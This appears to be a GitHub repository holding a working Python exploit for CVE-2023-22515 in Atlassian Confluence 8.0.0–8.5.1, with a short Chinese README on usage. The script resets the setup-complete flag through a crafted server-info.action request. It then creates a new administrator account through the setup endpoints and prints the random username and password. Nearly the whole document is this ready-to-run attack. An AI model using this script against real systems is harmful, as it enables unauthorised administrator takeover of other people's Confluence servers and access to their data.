├── CVE-2023-22515.py
└── README.md


/CVE-2023-22515.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import warnings
 3 | import urllib3
 4 | import argparse
 5 | import random
 6 | import string
 7 | 
 8 | # 异常忽略
 9 | urllib3.disable_warnings()
10 | warnings.filterwarnings("ignore")
11 | 
12 | parser = argparse.ArgumentParser()
13 | parser.add_argument('-url', type=str, default=None, help="目标url如：http://xx.xx.xx.xx")
14 | args = parser.parse_args()
15 | 
16 | url = args.url
17 | 
18 | proxy = '127.0.0.1:8080'
19 | 
20 | proxies = {
21 |     'http': 'http://' + proxy,
22 |     'https': 'https://' + proxy
23 | }
24 | 
25 | # 添加请求头
26 | headers = {
27 |     'X-Atlassian-Token': 'no-check',
28 |     'Content-Type': 'application/x-www-form-urlencoded'
29 | }
30 | 
31 | headers2 = {
32 |     'X-Atlassian-Token': 'no-check',
33 | }
34 | 
35 | response = requests.get(url + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false",
36 |                         verify=False)
37 | 
38 | str = response.text
39 | 
40 | if not str.__contains__("success"):
41 |     print("当前url不存在漏洞：" + url)
42 |     exit()
43 | 
44 | # 生成随机用户名和密码
45 | random_username = ''.join(random.choices(string.ascii_lowercase, k=8))
46 | random_password = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
47 | 
48 | d = "username=" + random_username + "&fullName=" + random_username + "&email=" + random_username + "%40localhost&password=" + random_password + "&confirm=" + random_password + "&setup-next-button=Next"
49 | 
50 | requests.post(url=url + "/setup/setupadministrator.action", headers=headers, data=d,
51 |               cookies=response.cookies,
52 |               verify=False)
53 | 
54 | requests.post(url + "/setup/finishsetup.action", headers=headers2, cookies=response.cookies, verify=False)
55 | print("添加成功")
56 | print("用户名：" + random_username)
57 | print("密码：" + random_password)
58 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2023-22515 Exploit Script
 2 | 
 3 | ## 影响版本
 4 | ```
 5 | 8.0.0<=Atlassian Confluence<=8.5.1
 6 | ```
 7 | 
 8 | ## 漏洞利用
 9 | 随机添加用户名和密码
10 | ```
11 | python3 CVE-2023-22515.py -h
12 | usage: confluence.py [-h] [-url URL]
13 | optional arguments:
14 |   -h, --help  show this help message and exit
15 |   -url URL    目标url如：http://xx.xx.xx.xx
16 | ```
17 | ![image](https://github.com/sincere9/CVE-2023-22515/assets/128219249/caedd132-4cdf-4f94-9831-e45721b85170)
18 | 


--------------------------------------------------------------------------------